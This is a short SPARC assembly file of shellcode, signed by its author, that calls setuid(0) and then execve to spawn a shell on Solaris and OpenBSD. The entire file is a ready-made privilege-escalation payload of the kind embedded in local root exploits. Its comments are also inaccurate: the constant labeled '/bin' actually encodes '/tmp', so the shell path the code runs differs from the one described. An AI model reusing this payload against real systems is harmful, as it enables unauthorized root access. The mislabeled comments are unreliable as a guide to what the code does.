!!!
!!! SPARC Shellcode to call setuid(0) and exec /bin/sh.
!!! Runs on Solaris, OpenBSD, maybe others.
!!! 
!!! -ghandi <ghandi@mindless.com>
!!! 

.global execsh, _execsh
.text

_execsh:
execsh:
	xor	%sp, %sp, %o0		! %o0 = 0;
	mov	23, %g1
	ta	8			! setuid(0);

	set	0x2f746d70, %l0		! (void*)sh = "/bin";
	set	0x2f736800, %l1		! (void*)sh + 4 = "/sh\0";
	std	%l0, [%sp - 16]
	sub	%sp, 16, %o0		! %o0 = "/bin/sh";

	xor	%sp, %sp, %o1
	std	%o0, [%sp - 8]
	sub	%sp, 8, %o1		! %o1 = {NULL};

	xor	%sp, %sp, %o2		! %o2 = NULL;

	mov	59, %g1
	ta	8			! execve(sh, argv, NULL);